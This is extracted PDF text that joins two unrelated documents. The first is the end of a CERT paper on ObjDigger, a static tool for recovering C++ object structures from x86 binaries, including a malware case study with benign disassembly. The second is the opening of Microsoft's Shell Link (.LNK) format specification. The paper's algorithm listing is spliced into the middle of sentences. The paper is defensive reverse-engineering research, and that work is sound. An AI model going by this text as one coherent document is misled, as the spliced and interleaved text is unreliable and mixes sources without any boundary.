Fig. 7 shows part of a constructor that calls two other methods at
0x4010C0 and 0x401080. It passes its ThisPtr without any offset to
the first call at 0x401107. It passes the second call the ThisPtr plus
0x10 at 0x401112. At 0x40111D and 0x401126, we observe that
these same memory locations are overwritten with constants cor-
responding to two new virtual function table addresses. Therefore,
we know that this constructor inherits from two other constructors,
at 0x4010C0 and 0x401080, whose layouts are embedded at offset
zero and sixteen of the class (see Fig. 2 for an example of single
inheritance and layout embedding).
In summary, there’s an open problem related to reliably distin-
guishing between embedded objects and multiple inheritance in the
absence of virtual functions in the parent. Some of our remaining
deficiencies stem from this difficulty, and we plan to continue in-
vestigating this problem in future work.
5.7 Object Instance Aggregation and Reporting
Our implementation aggregates data from object instances created
throughout a binary. This information is grouped by unique con-
structor, and in some cases builder methods that return object in-
stances that are largely indistinguishable from constructors. TheProcedure lookForInheritance()
Input :Func : function identified as a constructor, member of
ThisCalls
Input :Constructors : the set of all identified constructors
Input :ThisCalls : set of functions from findThisCall()
Input :Uses : the Uses map built by buildDependencies()
Input :Defs : the Defs map built by buildDependencies()
Result :Parents : set of parent/inherited constructors called
byFunc
1Parents←nil;
2passed←nil;
3foreachinstr∈getInstructions( Func)do
// Find calls to other constructors
4ifgetInstructionType( instr)=x86_call then
5target←getCallDest( instr);
6 iftarget∈Constructors then
// Get ThisPtr passed to each constructor
7 foreach⟨cxf,cxi⟩∈ThisCalls do
8 iftarget =cxfthen
9 foreach⟨symval ,aloc⟩∈Uses[cxi]do
10 ifaloc=ECX then
11 passed←passed∪⟨cxf,symval⟩;
// Look for mov instruction that overwrites
location of a passed ThisPtr
12foreachinstr∈getInstructions( Func)do
13ifgetInstructionType( instr)=x86_mov then
14 foreach⟨symval ,aloc⟩∈Defs[instr]do
15 ifisMemWriteType( aloc)then
16 foreach⟨pxf,thisptr⟩∈passed do
17 ifsymval =thisptr then
18 Parents←Parents∪pxf;
19returnParents ;
list of all seen data members and methods associated with an ob-
ject instance, produced by some constructor, are merged with that
of another object instance, produced by the same constructor. In-
formation from constructors known to belong to the same class,
for example because they share a common virtual table, are also
merged.
In this way we provide results to the analyst which are more use-
ful than individual object instances and yet are not truly class defi-
nitions either. With more rigorous detection of inheritance and ob-
ject embedding relationships these merged object instances should
converge on complete class definitions although we do not claim
that result in this work.
Fig. 8 shows data about merged object instances from one of
our experiments. Note that the actual output of our tool generates
raw addresses. For illustrative purposes here, we have substituted
the raw addresses with symbol information obtained from the com-
piler generated PDB files. This particular example shows correctly
identify methods, members and virtual function information from
the class XmlText. However, it also illustrates a case in which our
approach was unable to distinguish between an embedded object
and an inheritance relationship. XmlText inherits from XmlNode.
However, the XmlNode() andSetValue() methods of XmlNode
were reported as methods of XmlText.
Constructor: __thiscall XmlText::XmlText(char *)
Vtable: 4b7264
Vtable Contents:
Address: 4b7264 Pointer to Function @4035ae
Data Members:
Offset: 16 Size: 4
Offset: 20 Size: 4
Offset: 24 Size: 4
Offset: 28 Size: 4
Offset: 36 Size: 4
Offset: 40 Size: 4
Offset: 44 Size: 1
Methods:
void *__thiscall XmlText:: XmlText()
void __thiscall XmlNode::SetValue(char *)
__thiscall XmlNode::XmlNode(XmlNode::NodeType)
void *__thiscall XmlText::SetCDATA(bool)
Inherited methods:
Figure 8. Output of O BJDIGGER (with symbols substituted for
addresses).
6. Experiments
To validate our approach, we conducted experiments on open-
source packages, downloaded from SourceForge7, and on real-
world malware for which source is unavailable. We propose here
a framework for evaluating such algorithms using a mixture of
tool output, debugging information, and compiler generated class
member layouts.
6.1 Open-source Tests
6.1.1 Methodology
The open-source tests were designed to evaluate the effective-
ness of our approach given ground truth. The packages that we
used were: The Lean Mean C++ Option Parser version 1.3, Light
Pop3/SMTP Library, X3C C++ Plugin Framework version 1.0.2,
PicoHttpD Library version 1.2, and CImg Library version 1.0.5.
Each program serves a different purpose, such as XML or math
parsing, and includes test programs that exercise different parts of
their respective APIs. We ran our tool on a binary from each library.
In these experiments, ground truth came from three sources:
1) a compiler layout produced by MSVC (as shown in Fig. 2)
that contains information about the class layout and data members;
2) symbol information from compiler generated PDB files, which
allows us to map function addresses to symbolic names (from
which we can determine the classes in which they belong), and 3)
source code of the test programs and libraries.
The results of our experiments are summarized in Table 1. We
collected data in three categories for each test package:
1.# Unique classes found / # of unique classes . Using the symbol
information from the PDB, we counted the number of unique
classes instantiated in the binary code. We excluded classes that
were part of the standard compiler library. For the numerator,
we counted those classes for which O BJDIGGER identified at
least one instance of a constructor and associated methods and
members.
2.# of methods found / # of methods in binary . We used the sym-
bol information from the PDB to determine which methods
7http://www.sourceforge.netwere included in the binary. We counted a method as found by
OBJDIGGER if it was associated with at least one instance of
a constructor for the correct class. Note that inlined methods,
and methods which were not included in binary are not present
as symbols in the PDB file. We also excluded from the denom-
inator cases where source code inspection confirmed that the
methods were not in the control flow. This sometimes happen
the compiler includes functions just because they were part of
an object file.
3.# of data members found / # of data members in binary . Using
the compiler layout information we compared the class mem-
bers identified by O BJDIGGER to the members reported by the
compiler. In certain circumstances we excluded from the de-
nominator members that were known to have no uses in bi-
nary. This sometimes occurs when the compiler excludes the
only function which accesses a member because the method
was never called.
Our testing methodology, for each package, was as follows:
1. Compile test programs for the package. Generate layout in-
formation using the compiler and demangle class names using
undname.
2. Run O BJDIGGER on each binary which reports method ad-
dresses and object layouts, without names.
3. Extract symbol data from PDB files using IDA Pro8and de-
mangle names using undname9. This maps function addresses
to method names.
4. Correlate the function addresses from the O BJDIGGER output
to the names in the symbol data. As can be seen in Fig. 8,
the symbolic names specify the classes that particular methods
belong to, and allows us to determine the validity of grouped
methods.
5. Compare the discovered data members to those reported by the
compiler, using the class named obtained from the symbol for
the constructor.
6. Manually inspect the source code of each test program, exclud-
ing any methods or members as described in the previous sec-
tion.
Table 1. Test results for open-source packages.
Package Classes Methods Members
PicoHttpD 1.2 8/9 (89%) 31/47 (66%) 18/25 (72%)
x3c 1.0.2 4/5 (80%) 21/24 (88%) 6/8 (75%)
CImg 1.0.5 7/7 (100%) 61/83 (73%) 33/42 (79%)
OptionParser 10/10 (100%) 37/52 (71%) 33/35 (94%)
Light Pop3/SMTP 8/9 (89%) 29/35 (83%) 16/23 (70%)
6.1.2 Discussion
Table 1 lists the recall or true positive rate for O BJDIGGER . Method
and member totals are summed across all classes. While the table
does not explicitly list precision values, there were no false pos-
itives generated for this test set using the tool, so precision was
100% in all tests.
In each case, we verified that all identified methods and data
members were correctly associated with the classes in which they
actually belong by looking up their symbolic names.
8https://www.hex-rays.com/products/ida/
9Undname is a MSVC tool for demangling OO method names.
With regards to missed methods, O BJDIGGER was often able to
identify many of these missed methods as following __ thiscall , but
was not able to associate these missed methods with a specific class.
It was also able to group many of these missed methods with other
found methods that shared the same ThisPtr . Unfortunately, none of
those other found methods could be positively identified as a con-
structor. For example, in the case of PicoHttpD, the single missed
class was created as a global variable. A memory address for a lo-
cation in the .rdata section was passed to the constructor. How-
ever, currently, O BJDIGGER only checks for local stack addresses
and space allocated by new() . Thus, even though O BJDIGGER cor-
rectly identified that this same pointer to the .rdata was passed
as a ThisPtr in a couple of other methods (those that we missed),
we didn’t report a new class instance being found or any of these
associated methods. We chose this conservative approach to avoid
over counting unique class instances. It is possible that these meth-
ods could have belonged to an object instance from a class that had
already been identified, but created in another function.
When a constructor is not found, we are unable to associate any
of the found members or methods in that object instance with a
specific named class. This leads to a cascading effect where a single
missed constructor negatively affects recall. Additionally, missed
class methods also mean that any data members that were accessed
inside of them were missed as well. This cascading effect is a
fundamental challenge in analyzing OO code, since methods and
data members are tied together to produce the object abstraction.
With regards to the missed methods and data members in CImg
and Light Pop3, we suspect that these omissions were due to imple-
mentations bugs and not limitations with the approach. Specifically,
at the time of the experiments, O BJDIGGER had problems tracking
objects that were passed as parameters to other methods. The tool
also had problems identifying certain methods that were called in-
directly, by dereferencing addresses within a class’s virtual table.
We are currently working on addressing those issues.
A fundamental limitation of our approach is that we can only de-
tect methods and members called and accessed by the program be-
ing analyzed, respectively. Our technique relies on grouping meth-
ods together by shared ThisPtr . Thus, if a program creates a class
with methods the are never called by any instances of that class
(or associated with a unique constructor belonging to that class),
OBJDIGGER fails to detect these methods. Similarly, if a data mem-
ber is never accessed (i.e., O BJDIGGER never observes a mem-
ory read or write to a particular location within a class layout),
OBJDIGGER fails to detect this particular data member.
6.2 Closed-source Malware Case Study
Object-oriented malware presents many challenges to analysts. Un-
derstanding object structures can be critical for recovering func-
tionality. To demonstrate how O BJDIGGER can aid with mal-
ware analysis we used it to help analyze a malware sample
(file md5 019d3b95b261a5828163c77530aaa72f on http://www.
virustotal.com ).
It is not uncommon for OO malware to encapsulate critical, ma-
licious functionality in C++-style data structures. As a result, re-
verse engineering OO malware can be challenging because under-
standing program functionality may first require recovering C++
data structures.
Manually recovering C++ data structures can be a tedious and
error prone task, especially if done piecewise or in conjunction with
trying to understand program functionality. O BJDIGGER automat-
ically recovers object structures thereby streamlining analysis ef-
forts. For example, in the sample, O BJDIGGER quickly identifies
object instances and potential constructors.
Of the 585 functions within the sample, our tool identified nine
object instances and their constructors, methods, data members,and virtual function tables. The analyst can then inspect this re-
duced set to determine each data structure’s relevance to the pro-
gram.
0x401010 push 0FFFFFFFFh
0x401012 push 41497Bh
0x401017 mov eax, large fs:0
0x40101D push eax
0x40101E mov large fs:0, esp
0x401025 sub esp, 0A8h
0x40102B push esi
0x40102C lea ecx, [esp+4]
0x401030 call sub_403000
0x401035 mov eax, [esp+C0h]
0x40103C mov ecx, [esp+BCh]
0x401043 push eax
0x401044 push ecx
0x401045 lea ecx, [esp+Ch]
0x401049 mov dword ptr [esp+BCh], 0
0x401054 call sub_401470
0x401059 lea ecx, [esp+4]
0x40105D mov esi, eax
0x40105F mov dword ptr [esp+B4h], 0FFFFFFFFh
0x40106A call sub_401F20
0x40106F mov ecx, [esp+ACh]
0x401076 mov eax, esi
0x401078 pop esi
0x401079 mov large fs:0, ecx
0x401080 add esp, 0B4h
0x401086 retn
Figure 9. Main function of the malware sample.
Constructor: 403000
Vtable: 41647c
Vtable Contents:
Address: 41647c Pointer to Function @ 403030
Data Members:
Offset: 0x0 Size: 0x4
Offset: 0x8 Size: 0x4
Offset: 0x18 Size: 0x4
...
Offset: 0xa0 Size: 0x4
Offset: 0xa4 Size: 0x4
Methods:
401470
401f20
Figure 10. OBJDIGGER output for the malware sample main func-
tion.
Fig. 9 shows the disassembly for the main function generated
by IDA Pro. A cursory analysis of this function shows that it is a
relatively simple routine containing three methods: sub_403000 ,
sub_401470 , andsub_401f20 . Note that in Fig. 10, O BJDIGGER
identified all three of these methods as related to one object,
sub_403000 is the constructor and sub_401470 andsub_401f20
are class methods.
With this information the analyst immediately has a sense that
the malware’s functionality is organized around (at least) one object
instantiated in the main function. Because significant parts of the
program are encapsulated in this object understanding its internals
is likely critical to determining program functionality. For instance,
understanding the purpose of this object’s data members takes on
greater importance because of the object’s usage in the malware.
Notably, O BJDIGGER also provides information on class member
offset and size, further simplifying analytical efforts.
In this scenario, the information provided by O BJDIGGER could
be recovered manually, but this may take considerable effort. Au-
tomatically reasoning through C++ data structures saves time and
frees the analyst to focus on questions that are more relevant to
malware functionality.
7. Related Work
Sabanal et. al [18] provide a detailed discussion of recovering C++
data structures from binary code. In particular, they are the first
to describe heuristics for recognizing C++ objects by monitoring
the use of the ThisPtr in binary methods. Our work builds upon
their ideas, and captures these heuristics as machine recognizable
data-flow patterns. Additionally, our work goes one step further by
tracking the propagation of ThisPtr between function to identify
common data members and methods of classes. Jens Tröger and Ci-
fuentes [21] pioneered similar use of dataflow analysis techniques
applied to binaries to recover virtual function tables; however, their
work relied on dynamic execution of code to resolve addresses of
object methods.
Lee et. al. [13], Balakrishnan and Reps [2], and Ramalingam
et. al. [16] are focused on variable/data type recovery in executable
files. While type recovery is an important and related problem, our
primary concern is to recover the class structure of objects.
Srinivasan et. al [20] propose a method that uses dynamic anal-
ysis to observe call relationships between methods to infer class
hierarchy (similar to what we have done in a static context). How-
ever, their ability to recover class structure is limited to portions of
a binary that actually run. Furthermore, since they are not tracking
memory dereferences that use the ThisPtr , they do not recover data
members.
Slowinska et. al [19] and Lin et. al [14] are focused on type
discovery of variables using dynamic analysis. Although their work
does not deal with object-oriented code directly, their method of
tracking the use of memory locations to infer size and type is
similar to the way we track memory dereferences, involving the
ThisPtr , to infer size and offset of data members.
Adamantiadis [1] provides a detailed explanation of construc-
tors, destructors and virtual function tables at the binary level. They
give an example of reverse engineering an object-oriented C++ bi-
nary. However, the discussion does not propose an automated tech-
nique.
Dewey et. al [4] describe many techniques similar to the ones
we use in our work. They specifically state though they are focused
on analyzing known non-malicious code for a specific class of vul-
nerability. Our work is designed to be used explicitly for analyzing
malicious software.
Fokin et. al [7] adopt an approach that appears to be very similar
to ours, but provides less detail about the data flow analysis. Their
earlier work [6] provides interesting insights about the aggregation
of related object instances into classes.
8. Conclusion and Future Work
In this paper, we present a purely static approach for recovering
object instances, data members and methods from x86 binaries,
compiled using MSVC. We produced a tool, O BJDIGGER , which
we tested against open-source software and real-world malware. A
comparison of the output from the open-source tests against ground
truth, generated by the compiler’s debug information, indicates that
our technique can achieve its goal effectively. The tests against real-
world malware demonstrate that our tool can aid in the malware
reverse engineering process.
While our experiments demonstrate that our approach is viable,
there is room for improvement. First, O BJDIGGER needs to be
extended to recognize and recover objects instantiated on a globalscope. We are currently exploring this direction, building on data-
flow analysis techniques to reason through mechanics of global
object creation and storage.
In certain object arrangements, inheritance and composition are
hard to distinguish. Determining whether an embedded object is a
parent or a member without using the presence of virtual function
tables is an open problem. More work is needed to correctly iden-
tify this arrangement. Similarly, constructors and destructors can
be difficult to distinguish under certain circumstances. O BJDIGGER
needs to be extended to accurately identify destructors to enable
better identification and tracking of object scope.
Advanced OO features of C++, such as virtual inheritance, are
currently not supported. Virtual inheritance fundamentally changes
the layout of objects in memory. The primary mechanism to imple-
ment virtual inheritance is the virtual base class tables . The virtual
base class table maintains offset to multiple parent classes to re-
move ambiguity possible with multiple inheritance. O BJDIGGER
must be extended to correctly recognize and interpret these tables.
Further investigation is needed to fully understand the impli-
cations of compiler optimizations such as inlining of constructors,
destructors, and other methods.
Finally, further experimentation is needed to determine to what
extent O BJDIGGER can analyze non-MSVC generated binaries.
Preliminary analysis suggests that compilers such as the GNU C++
Compiler use similar mechanisms to implement OO C++ features,
but additional investigation is needed to determine what, if any
nuances exist in different compilers. It might also be interesting to
investigate what we can discover of OO patterns in other languages,
such as Delphi, which analysts see frequently in the malware realm.
On a more practical note, the output of O BJDIGGER can cer-
tainly be improved to help the analyst more quickly see relation-
ships between methods and objects (perhaps as a custom plugin to
IDA Pro).
Acknowledgments
This material is based upon work funded and supported by the De-
partment of Defense under Contract No. FA8721-05-C-0003 with
Carnegie Mellon University for the operation of the Software En-
gineering Institute, a federally funded research and development
center. This material has been approved for public release and un-
limited distribution. Carnegie Mellon®, CERT®, CERT Coordina-
tion Center® are registered in the U.S. Patent and Trademark Office
by Carnegie Mellon University. DM-0000440
References
[1] Aris Adamantiadis. Reversing C++ programs with IDA pro and and
Hey-rays. http://blog.0xbadc0de.be/archives/67 .
[2] Gogul Balakrishnan and Thomas Reps. Divine: discovering variables
in executables. In Proceedings of the 8th international conference on
Verification, model checking, and abstract interpretation , VMCAI’07,
pages 1–28, Berlin, Heidelberg, 2007. Springer-Verlag.
[3] Keith D. Cooper, Timothy J. Harvey, and Ken Kennedy. Iterative
data-flow analysis, revisited. Technical report, Rice University, 2004.
[4] David Dewey and Jonathon T. Giffin. Static detection of C++
vtable escape vulnerabilities in binary code. In Proceedings
of the 19th Annual Network and Distributed System Security
Symposium , NDSS’12, http://www.internetsociety.org/
static-detection-c-vtable-escape-vulnerabilities-
binary-code , 2012.
[5] Agner Fog, Technical University of Denmark. Calling conventions
for different C++ compilers and operating systems. http://www.
agner.org/optimize/calling_conventions.pdf , pages 16–
17, Last Updated 04-09-2013.
[6] Alexander Fokin, Katerina Troshina, and Alexander Chernov.
Reconstruction of Class Hierarchies for Decompilation of C++
Programs. In Proceedings of the 14th European Conference on
Software Maintenance and Reengineering (CSMR’10) , IEEE, pages
240–243, 2010.
[7] Alexander Fokin, Egor Derevenetc, Alexander Chernov, and Katerina
Troshina. SmartDec: Approaching C++ Decompilation. In Pro-
ceedings of the 18th Working Conference on Reverse Engineering ,
WCRE’11, pages 347–356, 2011.
[8] Jan Gray. C++: Under the Hood. http://www.openrce.org/
articles/files/jangrayhood.pdf , 1994.
[9] S. Horwitz, T. Reps, and D. Binkley. Interprocedural Slicing Using
Dependence Graphs. In Proceedings of the ACM SIGPLAN 1988
Conference on Programming Language Design and Implementation
(PLDI’88) , pages 35–46, 1988.
[10] Harold Johnson. Data flow analysis for ‘intractable’ system software.
InSIGPLAN Symposium on Compiler Construction , pages 109–117,
1986.
[11] James C. King. Symbolic Execution and Program Testing. Communi-
cations of the ACM (CACM) , 19(7), July 1976.
[12] Ákos Kiss, Judit Jász, and Tibor Gyimóthy. Using dynamic
information in the interprocedural static slicing of binary executables.
Software Quality Control , 13(3):227–245, September 2005.
[13] JongHyup Lee, Thanassis Avgerinos, and David Brumley. Tie:
Principled reverse engineering of types in binary programs. In NDSS .
The Internet Society, 2011.
[14] Z. Lin, X. Zhang, and D. Xu. Automatic Reverse Engineering of Data
Structures from Binary Execution. In Proceedings of the Network and
Distributed System Security Symposium (NDSS’2010) , March 2010.
[15] Dan Quinlan. ROSE: Compiler support for object-oriented frame-
works. In Parallel Processing Letters 10 , no. 02n03, pages 215–226.
2000.
[16] G. Ramalingam, John Field, and Frank Tip. Aggregate structure
identification and its application to program analysis. In Proceedings
of the 26th ACM SIGPLAN-SIGACT symposium on Principles of
programming languages , POPL ’99, pages 119–132, New York, NY ,
USA, 1999. ACM.
[17] ROSE website. http://www.rosecompiler.org .
[18] Paul Vincent Sabanal and Mark Vincent Yason. Reversing
C++. http://www.blackhat.com/presentations/bh-dc-07/
Sabanal_Yason/Paper/bh-\dc-07-Sabanal_Yason-WP.pdf .
[19] Asia Slowinska, Traian Stancescu, and Herbert Bos. Dde: dynamic
data structure excavation. In Proceedings of the first ACM asia-pacific
workshop on Workshop on systems , APSys ’10, pages 13–18, New
York, NY , USA, 2010. ACM.
[20] V .K. Srinivasan and T. Reps. Software Architecture Recovery from
Machine Code. Technical Report TR1781, University of Wisconsin
- Madison, March 2013. http://digital.library.wisc.edu/
1793/65091 .
[21] Jens Tröger, and Cristina Cifuentes. Analysis of Virtual Method
Invocation for Binary Translation. In Proceedings of the 9th Working
Conference on Reverse Engineering (WCRE ’02) , IEEE Computer
Society, pages 65–, 2002. 
1 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  [MS-SHLLINK]:  
Shell Link (.LNK) Binary File Format  
 
Intellectual Property Rights Notice for Open Specifications Documentation  
 Technical Documentation.  Microsoft publishes Open Specifications documentation for 
protocols, file formats, languages, standards as well as overviews of the interaction among each 
of these technologies.  
 Copyrights.  This documentation is covered by Microsoft copyrights. Regardles s of any other 
terms that are contained in the terms of use for the Microsoft website that hosts this 
documentation, you may make copies of it in order to develop implementations of the 
technologies described in the Open Specifications and may distribute p ortions of it in your 
implementations using these technologies or your documentation as necessary to properly 
document the implementation. You may also distribute in your implementation, with or without 
modification, any schema, IDL’s, or code samples that  are included in the documentation. This 
permission also applies to any documents that are referenced in the Open Specifications.  
 No Trade Secrets.  Microsoft does not claim any trade secret rights in this documentation.  
 Patents.  Microsoft has patents that  may cover your implementations of the technologies 
described in the Open Specifications. Neither this notice nor Microsoft's delivery of the 
documentation grants any licenses under those or any other Microsoft patents. However, a given 
Open Specification may be covered by Microsoft's Open Specification Promise (available here:  
http://www.microsoft.com/interop/osp ) or the Community Promise (available here: 
http://www.microsoft.com/interop/cp/default.mspx ). If you would prefer a written license, or if 
the technologies described in the Open Specifications are not covered by the Open Specifications 
Promise or Community Promise, as applicab le, patent licenses are available by contacting 
iplg@microsoft.com . 
 Trademarks.  The names of companies and products contained in this documentation may be 
covered by trademarks or similar intellectual property rights . This notice does not grant any 
licenses under those rights.  
 Fictitious Names.  The example companies, organizations, products, domain names, e -mail 
addresses, logos, people, places, and events depicted in this documentation are fictitious.  No 
association  with any real company, organization, product, domain name, email address, logo, 
person, place, or event is intended or should be inferred.  
Reservation of Rights.  All other rights are reserved, and this notice does not grant any rights 
other than specifica lly described above, whether by implication, estoppel, or otherwise.  
Tools.  The Open Specifications do not require the use of Microsoft programming tools or 
programming environments in order for you to develop an implementation. If you have access to 
Micro soft programming tools and environments you are free to take advantage of them. Certain 
Open Specifications are intended for use in conjunction with publicly available standard 
specifications and network programming art, and assumes that the reader either is familiar with the 
aforementioned material or has immediate access to it.  
 
2 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  Revision Summary  
Date  Revision History  Revision Class  Comments  
05/22/2009  0.1 Major  First Release.  
07/02/2009  0.1.1 Editorial  Revised and edited the technical content.  
08/14/2009  0.2 Minor  Updated the technical content.  
09/25/2009  0.3 Minor  Updated the technical content.  
11/06/2009  0.3.1 Editorial  Revised and edited the technical content.  
12/18/2009  0.3.2 Editorial  Revised and edited the technical content.  
01/29/2010  0.4 Minor  Updated the technical content.  
03/12/2010  0.4.1 Editorial  Revised and edited the technical content.  
04/23/2010  0.5 Minor  Updated the technical content.  
06/04/2010  0.6 Minor  Updated the technical content.  
 
3 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  Contents  
1   Introduction  ................................ ................................ ................................ .............  4 
1.1   Glossary  ................................ ................................ ................................ ...............  4 
1.2   References  ................................ ................................ ................................ ............  5 
1.2.1   Normative References  ................................ ................................ .......................  5 
1.2.2   Informative References  ................................ ................................ .....................  5 
1.3   Overview  ................................ ................................ ................................ ..............  6 
1.4   Relationship to Protocols and Oth er Structures  ................................ ..........................  6 
1.5   Applicability Statement  ................................ ................................ ...........................  7 
1.6   Versioning and Localization  ................................ ................................ .....................  7 
1.7   Vendor -Extensible Fields  ................................ ................................ .........................  7 
2   Structures  ................................ ................................ ................................ ................  8 
2.1   ShellLinkHeader ................................ ................................ ................................ ..... 8 
2.1.1   LinkFlags  ................................ ................................ ................................ ....... 10 
2.1.2   FileAttributesFlags  ................................ ................................ ..........................  12 
2.1.3   HotKeyFlags  ................................ ................................ ................................ .. 13 
2.2   LinkTargetIDList  ................................ ................................ ................................ .. 17 
2.2.1   IDList  ................................ ................................ ................................ ...........  17 
2.2.2   ItemID  ................................ ................................ ................................ ..........  18 
2.3   LinkInfo  ................................ ................................ ................................ ..............  18 
2.3.1   VolumeID  ................................ ................................ ................................ ...... 21 
2.3.2   CommonNetworkRelativeLink  ................................ ................................ ...........  23 
2.4   StringData  ................................ ................................ ................................ ..........  26 
2.5   ExtraData  ................................ ................................ ................................ ...........  27 
2.5.1   ConsoleDataBlock  ................................ ................................ ...........................  29 
2.5.2   ConsoleFEDataBlock  ................................ ................................ .......................  33 
2.5.3   DarwinDataBlock  ................................ ................................ ............................  34 
2.5.4   EnvironmentVariableDataBlock  ................................ ................................ ........  35 
2.5.5   IconEnvir onmentDataBlock  ................................ ................................ ..............  37 
2.5.6   KnownFolderDataBlock  ................................ ................................ ....................  38 
2.5.7   PropertyStoreDataBlock  ................................ ................................ ..................  39 
2.5.8   ShimDataBlock  ................................ ................................ ..............................  39 
2.5.9   SpecialFolderDataBlock  ................................ ................................ ...................  40 
2.5.10   TrackerDataBlock  ................................ ................................ .........................  40 
2.5.11   VistaAndAboveIDListDataBlock  ................................ ................................ ....... 42 
3   Structure Examples  ................................ ................................ ................................  44 
3.1   Shortcut to a File  ................................ ................................ ................................ . 44 
4   Security  ................................ ................................ ................................ ..................  48 
5   Appendix A: Product Behavior  ................................ ................................ ................  49 
6   Change Tracking ................................ ................................ ................................ ..... 50 
7   Index  ................................ ................................ ................................ .....................  52 
 
4 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  1   Introduction  
This is a specification of the Shell Link Binary File Format. In this format a structure is called a shell 
link, or shortcut , and is a data object  that contains information that can be used to access 
another data object. The Shell Link Binary File Format is the format of Microsoft Windows® files with 
the extension "LNK".  
Shell links are commonly used to support application launching and linking scen arios, such as 
Object Linking and Embedding (OLE) , but they also can be used by applications that need the 
ability to store a reference to a target file.  
1.1   Glossary  
The following terms are defined in [MS-GLOS] : 
American National Standards Institute (ANSI) character set  
Augmented Backus -Naur Form (ABNF)  
class identifier (CLSID)  
code page  
Component Object Model (COM)  
Coordinated Universal Time (UTC)  
GUID  
little -endian  
NetBIOS name  
object (3)  
Unicode  
Universal Naming Convention (UNC)  
The following terms are specific to this document:  
extra data section: A data structure appended to the basic Shell Link Binary File Forma t data 
that contains additional information about the link target . 
folder integer ID: An integer value that identifies a known folder.  
folder GUID ID: A GUID  value that identifies a known folder. Some folder GUID ID values 
correspond to folder integer ID  values.  
item ID (ItemID): A structure that represents an item in the context of a shell data source . 
item ID list (IDList): A data structure that refers to a location. An item ID list is a multi -
segment data structure where each segment's content is defined by a data source that is 
responsible for the location in the namespace  referred to by the preceding segments.  
link: An object  that refers to another item.  
link target: The item that a link references . In the case of a shell link , the referenced item is 
identified by its location in the link target namespace  using an item ID list (IDList) . 
link target namespace: A hierarchical namespace . In Windows, the link target namespace is 
the Windows Explorer  namespace , as described in [C706] . 
namespace: An abstract container used to hold a set of unique identifiers.  
Object Linking and Embedding (OLE): A technology for transferring and sharing information 
between applications by inserting a file or part of a file into a compound document. The 
 
5 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  inserted file can be either linked or embedded. An embedded item is stored as part of the 
compound document that contains it; a linked item stores its data in a separate file.  
relative path: A path that is implied by the current working directory or is calculated based on a 
specified directory. When a user enters a command that refers to a file, and the full path is 
not entered, the current working directory becomes the relative path of the referenced file.  
resolving a link: The act of finding a specific link target , confirming that it exists, and finding 
whether it has moved.  
Red-Green -Blue (RGB): A mapping of color components in which red, green, and blue and an 
intensity value are combined in various ways to reproduce a range of colors.  
shell data source: An object  that is responsible for a specific location in the namespace  and 
for enume rating and binding IDLists  to handlers.  
shell link: A structure in Shell Link Binary File Format.  
shim: A mechanism used to provide custom behavior to applications that do not work on newer 
versions of the operating system.  
shortcut: A term that is used sy nonymously with shell link . 
MAY, SHOULD, MUST, SHOULD NOT, MUST NOT: These terms (in all caps) are used as 
described in [RFC2119] . All statements of optional behavior use either MAY, SHOULD, or 
SHOULD NOT.  
1.2   References  
1.2.1   Normative References  
We conduct frequent surveys of the normative references to assure their continued availability. If 
you have any issue with finding a normative reference, please contact dochelp@microsoft.com . We 
will assist you in finding the relevant information. Please check the archive site, 
http://msdn2.microsoft.com/en -us/library/E4BD6494 -06AD -4aed-9823-445E921C9624 , as an 
additional source.  
[MS-DFSNM] Microsoft Corporation, " Distributed File System (DFS): Namespace Management 
Protocol Specification ", September 2007.             
[MS-DTYP] Microsoft Corporation, " Windows Data Types ", January 2007.             
[MS-LCID] Microsoft Corporation, " Windows Language Code Identifier (LCID) Reference ", July 2007.             
[MS-PROPSTORE] Microsoft Corporation, "Property  Store Binary File Format", May 2009.  
[RFC2119] Bradner, S., "Key words for use in RFCs to Indicate Requirement Levels", BCP 14, RFC 
2119, March 1997, http://www.ietf.org/rfc/rfc2119.txt  
[RFC5234] Crocker, D., Ed., and Overell, P., "Augmented BNF for Syntax Specifications: ABNF", STD 
68, RFC 5234, January 2008, http://www.ietf.org/rfc/rfc5234.txt  
1.2.2   Informative References  
[C706] The Open Group, "DCE 1.1: Remote Procedure Call", C706, August 1997, 
http://www.opengroup.org/public/pubs/catalog/c706.htm  
 
6 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  [MS-DLTW] Microsoft Corporation, " Distributed Link Tracking: Workstation Protocol Specification ", 
January 2007.             
[MS-GLOS] Microsoft Corporation, " Windows Protocols Master Glossary ", March 2007.             
[MSCHARSET] Micro soft Corporation, "INFO: Windows, Code Pages, and Character Sets", February 
2005, http://support.microsoft.com/kb/75435  
[MSDN -CODEPAGE] Microsoft Corporation, "Common Pages", http://msdn.microsoft.com/en -
us/goglobal/bb964653.aspx  
[MSDN -ISHELLLINK] Microsoft Corporation,"IShellLink Interface", http://msdn.microsoft.com/en -
us/library /bb774950.aspx  
[MS-CFB] Microsoft Corporation, " Compound File Binary File Format ", October 2008.             
[MSDN -MSISHORTCUTS] Microsoft Corporation, "How Windows Installer Shortcuts Work", 
http://support.microsoft.com/kb/243630  
1.3   Overview  
The Shell Link Binary File Format specifies a structure called a shell link. That structure is used to 
store a reference to a location in a link target namespace , which is referred to as a link target . 
The most important component of a link target namespace is a link target in the form of an item ID 
list (IDList) . 
The shell link structure stores various information that is useful to end users, including:  
A keyboard shortc ut that can be used to launch an application.  
A descriptive comment.  
Settings that control application behavior.  
Optional data stored in extra data sections . 
Optional data can include a property store that contains an extensible set of properties in the format 
that is described in [MS-PROPSTORE] . 
The Shell Link Binary File Format can be managed using a COM object, programmed using the 
IShellLink  interface, and saved into its persistence format using the IPersistStream  or 
IPersistFile  interface. It is most common for shell links to be stored in a file with the .LNK file 
extension. By using the IPersistStream  interface, a shell link can be saved into another storage 
